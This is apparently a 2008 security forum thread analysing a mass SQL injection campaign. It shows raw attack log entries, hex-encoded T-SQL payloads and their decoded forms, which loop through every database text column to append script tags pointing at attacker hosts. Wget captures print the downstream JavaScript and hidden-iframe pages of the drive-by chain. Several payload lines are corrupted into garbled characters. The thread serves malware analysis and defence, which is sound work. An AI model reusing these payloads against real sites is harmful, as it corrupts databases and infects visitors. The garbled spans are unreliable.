0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207!
372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script 7!
7&3&嘒GⅡ6F蜚謗6怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62

The link returns a 500 Internal server error.
Title: Re: SQL Injected jscript sites
Post by: Orac on August 21, 2008, 11:11:43 am
New sql injection, weve seen 418 seperate injection attempts involving the script within the last 24 hours.



Sample Log entry, IP obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [20/Aug/2008:20:17:01 +0000] "GET /forums/index.php?showtopic=1440';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0(Compatible Mozilla/4.0(Compatible-EmbeddedWB 14.59 http://bsalsa.com/ EmbeddedWB- 14.59  from: http://bsalsa.com/ )" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"!
></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Weve also seen a second version of this script, differences as follows
Code: [Select]
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B652!
0272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E31303030796C632E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www2.1000ylc.cn/csrss/w.js"></script><!--'' where '+@C+' not like2!
rrR#懵鱂桭芐闱67&B7&3&嘒GⅡ鱳ws"柶26怫77'72鱮妲2#懵67&C懵乙rrr攄UD4銾匓e$粢F&芔7W'6"斿DB2T銪4孽4RF&芔7W'6"DT哪4DRF&芔7W'62




Code: [Select]
--11:38:09--  http://www2.1000ylc.cn/csrss/w.js
           => `w.js'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/new.htm></iframe>");

}else{
document.write("<iframe  width=0 height=0 src=http://www2.1000ylc.cn/csrss/notnew.htm></iframe>");

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}



Code: [Select]
--11:39:44--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500



Code: [Select]
--11:40:21--  http://www2.1000ylc.cn/csrss/new.htm
           => `new.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>




Code: [Select]
--11:41:56--  http://www2.1000ylc.cn/csrss/notnew.htm
           => `notnew.htm'
Resolving www2.1000ylc.cn... 121.11.76.85
Connecting to www2.1000ylc.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src="http://js.users.51.la/2087412.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>





Code: [Select]
--11:43:17--  http://s96.cnzz.com/stat.php
           => `stat.php'
Resolving s96.cnzz.com... 219.232.243.5
Connecting to s96.cnzz.com[219.232.243.5]:80... connected
HTTP request sent, awaiting response... 200 OK

This returned a 0 byte page


Code: [Select]
--11:44:38--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087353&tpages=\'+a7353ops+\'&ttimes=\'+a7353ot+\'&tzone=\'+(0-a7353d.getTimezoneOffset()/60)+\'&tcolor=\'+a7353color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7353of)+\'&vpage=\'+escape(a7353op)+\'" \/>\');<\/script>');



Code: [Select]
--11:46:04--  http://js.users.51.la/2087412.js
           => `2087412.js'
Resolving js.users.51.la... 202.104.236.224
Connecting to js.users.51.la[202.104.236.224]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087412" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7412tf="51la";var a7412pu="";var a7412pf="51la";var a7412su=window.location;var a7412sf=document.referrer;var a7412of="";var a7412op="";var a7412ops=1;var a7412ot=1;var a7412d=new Date();var a7412color="";if (navigator.appName=="Netscape"){a7412color=screen.pixelDepth;} else {a7412color=screen.colorDepth;}<\/script><script>a7412tf=top.document.referrer;<\/script><script>a7412pu =window.parent.location;<\/script><script>a7412pf=window.parent.document.referrer;<\/script><script>a7412ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7412ops=(a7412ops==null)?1: (parseInt(unescape((a7412ops)[2]))+1);var a7412oe =new Date();a7412oe.setTime(a7412oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7412ops+ ";path=/;expires="+a7412oe.toGMTString();a7412ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7412ot==null){a7412ot=1;}else{a7412ot=parseInt(unescape((a7412ot)[2])); a7412ot=(a7412ops==1)?(a7412ot+1):(a7412ot);}a7412oe.setTime(a7412oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7412ot+";path=/;expires="+a7412oe.toGMTString();<\/script><script>a7412of=a7412sf;if(a7412pf!=="51la"){a7412of=a7412pf;}if(a7412tf!=="51la"){a7412of=a7412tf;}a7412op=a7412pu;try{lainframe}catch(e){a7412op=a7412su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=27&id=2087412&tpages=\'+a7412ops+\'&ttimes=\'+a7412ot+\'&tzone=\'+(0-a7412d.getTimezoneOffset()/60)+\'&tcolor=\'+a7412color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a7412of)+\'&vpage=\'+escape(a7412op)+\'" \/>\');<\/script>');

Title: Re: SQL Injected jscript sites
Post by: Orac on August 22, 2008, 11:12:17 am
Sample Log entry, IP address obfuscated for privacy
Code: [Select]
xxx.xxx.xxx.xxx - - [22/Aug/2008:03:08:47 +0000] "GET /forums/index.php?showtopic=3063';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 1223 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; .NET CLR 1.1.4322; InfoPath.1)" (malwarebytes.org) "-"

Decoded
Code: [Select]
DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


Code: [Select]
--11:43:29--  http://www0.douhunqn.cn/csrss/w.js
           => `w.js'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
if(typeof(js1eus)=="undefined")
{
var js1eus=1;

var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144'+yesdata+' height=0 width=0></iframe>');

var nus=navigator.userLanguage.toUpperCase();
if(nus=="EN-US")
{
document.write("<iframe  width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");

}else{

}

}

function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;var j;while(i<clen) {j=i+alen;if(document.cookie.substring(i,j)==arg) return y_gVal(j);i=document.cookie.indexOf(" ",i)+1;if(i==0) break;}return null;}
function cc_k()
{var y_e=new Date();var y_t=93312000;var yesvisitor=1000*36000;var yesctime=y_e.getTime();y_e.setTime(y_e.getTime()+y_t);var yesiz=document.cookie.indexOf("cck_lasttime");if(yesiz==-1){document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() +  "; path=/";document.cookie="cck_count=0; expires=" + y_e.toGMTString() +  "; path=/";return 0;}else{var y_c1=y_g("cck_lasttime");var y_c2=y_g("cck_count");y_c1=parseInt(y_c1);y_c2=parseInt(y_c2);y_c3=yesctime-y_c1;if(y_c3>yesvisitor){y_c2=y_c2+1;document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";}return y_c2;}}


Code: [Select]
--11:45:34--  http://count41.51yes.com/sa.aspx
           => `sa.aspx'
Resolving count41.51yes.com... 222.173.188.45
Connecting to count41.51yes.com[222.173.188.45]:80... connected
HTTP request sent, awaiting response... 500

Code: [Select]
<html>
    <head>
        <title>运行时错误</title>
        <style>
        body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
        p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
        b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
        H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
        H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
        pre {font-family:"Lucida Console";font-size: .9em}
        .marker {font-weight: bold; color: black;text-decoration: none;}
        .version {color: gray;}
        .error {margin-bottom: 10px;}
        .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
        </style>
    </head>

    <body bgcolor="white">

            <span><H1>“/”应用程序中的服务器错误。<hr width=100% size=1 color=silver></H1>

            <h2> <i>运行时错误</i> </h2></span>

            <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

            <b> 说明: </b>服务器上出现应用程序错误。此应用程序的当前自定义错误设置禁止远程查看应用程序错误的详细信息(出于安全原因)。但可以通过在本地服务器计算机上运行的浏览器查看。
            <br><br>

            <b>详细信息:</b> 若要使他人能够在远程计算机上查看此特定错误信息的详细信息,请在位于当前 Web 应用程序根目录下的“web.config”配置文件中创建一个 &lt;customErrors&gt; 标记。然后应将此 &lt;customErrors&gt; 标记的“mode”属性设置为“Off”。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;Off&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

            <b>注释:</b> 通过修改应用程序的 &lt;customErrors&gt; 配置标记的“defaultRedirect”属性,使之指向自定义错误页的 URL,可以用自定义错误页替换所看到的当前错误页。<br><br>

            <table width=100% bgcolor="#ffffcc">
               <tr>
                  <td>
                      <code><pre>

&lt;!-- Web.Config 配置文件 --&gt;

&lt;configuration&gt;
    &lt;system.web&gt;
        &lt;customErrors mode=&quot;RemoteOnly&quot; defaultRedirect=&quot;mycustompage.htm&quot;/&gt;
    &lt;/system.web&gt;
&lt;/configuration&gt;</pre></code>

                  </td>
               </tr>
            </table>

            <br>

    </body>
</html>


Code: [Select]
--11:48:08--  http://www0.douhunqn.cn/csrss/new.htm
           => `new.htm'
Resolving www0.douhunqn.cn... 121.11.76.85
Connecting to www0.douhunqn.cn[121.11.76.85]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script src='http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605' language='javaScript' charset='gb2312'></script>
<iframe src=flash.htm width=100 height=10></iframe>
<iframe src=06014.html width=100 height=10></iframe>
<iframe src=yahoo.htm width=100 height=10></iframe>
<iframe src=office.htm width=100 height=10></iframe>
<iframe src=ksx.htm width=100 height=10></iframe>
<script src="http://js.users.51.la/2087353.js"></script>

<script language="JavaScript">
<!--
var SymRealOnLoad;
var SymRealOnUnload;

function SymOnUnload()
{
  window.open = SymWinOpen;
  if(SymRealOnUnload != null)
     SymRealOnUnload();
}

function SymOnLoad()
{
  if(SymRealOnLoad != null)
     SymRealOnLoad();
  window.open = SymRealWinOpen;
  SymRealOnUnload = window.onunload;
  window.onunload = SymOnUnload;
}

SymRealOnLoad = window.onload;
window.onload = SymOnLoad;

//-->
</script>


Code: [Select]
--11:51:03--  http://s96.cnzz.com/stat.php?id=1019605&web_id=1019605
           => `stat.php?id=1019605&web_id=1019605'
Resolving s96.cnzz.com... 219.232.241.133
Connecting to s96.cnzz.com[219.232.241.133]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
function gv_cnzz(of){
var es = document.cookie.indexOf(";",of);
if(es==-1) es=document.cookie.length;
return unescape(document.cookie.substring(of,es));
}
function gc_cnzz(n){
var arg=n+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;
while(i<clen){
var j=i+alen;
if(document.cookie.substring(i,j)==arg) return gv_cnzz(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return -1;
}
var ed=new Date();
var now=parseInt(ed.getTime());
var agt=navigator.userAgent.toLowerCase();
var data='&agt='+escape(agt)+'&r='+escape(document.referrer)+'&aN='+escape(navigator.appName)+'&lg='+escape(navigator.systemLanguage)+'&OS='+escape(navigator.platform)+'&aV='+escape(navigator.appVersion)+'&ntime=0.17388800 1219402362';
var cnzz_a=gc_cnzz("cnzz_a1019605");
if(cnzz_a!=-1) cnzz_a=parseInt(cnzz_a)+1;
else cnzz_a=0;
var rt=parseInt(gc_cnzz("rtime"));
var lt=parseInt(gc_cnzz("ltime"));
var eid=gc_cnzz("cnzz_eid");
if(eid==-1) eid=Math.floor(Math.random()*100000000)+"-"+document.referrer;
if(lt<1000000){rt=0;lt=0;}
if(rt<1) rt=0;
if(((now-lt)>500*86400)&&(lt>0)) rt++;
data=data+'&repeatip='+cnzz_a+'&rtime='+rt+'&cnzz_eid='+escape(eid)+'&showp='+escape(screen.width+'x'+screen.height);
document.write('<a href="http://www.cnzz.com/stat/website.php?web_id=1019605" target=_blank title="站长统计">站长统计</a>');
document.write('<img src="http://222.77.187.203/stat.htm?id=1019605'+data+'" border=0 width=0 height=0>');
var et=(86400-ed.getHours()*3600-ed.getMinutes()*60-ed.getSeconds());
ed.setTime(now+1000*(et-ed.getTimezoneOffset()*60));
document.cookie="cnzz_a1019605="+cnzz_a+";expires="+ed.toGMTString()+ "; path=/";
ed.setTime(now+1000*86400*182);
document.cookie="rtime="+rt+";expires="+ed.toGMTString()+ ";path=/";
document.cookie="ltime="+now+";expires=" + ed.toGMTString()+ ";path=/";
document.cookie="cnzz_eid="+escape(eid)+ ";expires="+ed.toGMTString()+";path=/";


Code: [Select]
--11:55:32--  http://js.users.51.la/2087353.js
           => `2087353.js'
Resolving js.users.51.la... 122.224.146.36
Connecting to js.users.51.la[122.224.146.36]:80... connected
HTTP request sent, awaiting response... 200 OK

Code: [Select]
document.write ('<a href="http://www.51.la/?2087353" target="_blank"><img alt="&#x35;&#x31;&#x2E;&#x6C;&#x61;&#x20;&#x4E13;&#x4E1A;&#x3001;&#x514D;&#x8D39;&#x3001;&#x5F3A;&#x5065;&#x7684;&#x8BBF;&#x95EE;&#x7EDF;&#x8BA1;" src="http://icon.ajiang.net/icon_0.gif" style="border:none" /></a>\n');
// A Popular Free Statistics Service for 100 000+ Webmasters.
window.onerror=function(){return true};
document.write ('<script>var a7353tf="51la";var a7353pu="";var a7353pf="51la";var a7353su=window.location;var a7353sf=document.referrer;var a7353of="";var a7353op="";var a7353ops=1;var a7353ot=1;var a7353d=new Date();var a7353color="";if (navigator.appName=="Netscape"){a7353color=screen.pixelDepth;} else {a7353color=screen.colorDepth;}<\/script><script>a7353tf=top.document.referrer;<\/script><script>a7353pu =window.parent.location;<\/script><script>a7353pf=window.parent.document.referrer;<\/script><script>a7353ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a7353ops=(a7353ops==null)?1: (parseInt(unescape((a7353ops)[2]))+1);var a7353oe =new Date();a7353oe.setTime(a7353oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a7353ops+ ";path=/;expires="+a7353oe.toGMTString();a7353ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a7353ot==null){a7353ot=1;}else{a7353ot=parseInt(unescape((a7353ot)[2])); a7353ot=(a7353ops==1)?(a7353ot+1):(a7353ot);}a7353oe.setTime(a7353oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a7353ot+";path=/;expires="+a7353oe.toGMTString();<\/script><script>a7353of=a7353sf;if(a7353pf!=="51la"){a7353of=a7353pf;}if(a7353tf!=="51la"){a7353of=a7353tf;}a7353op=a7353pu;try{lainframe}catch(e){a7353op=a7353su;}document.write(\'<img style="width:0px;height:0px" 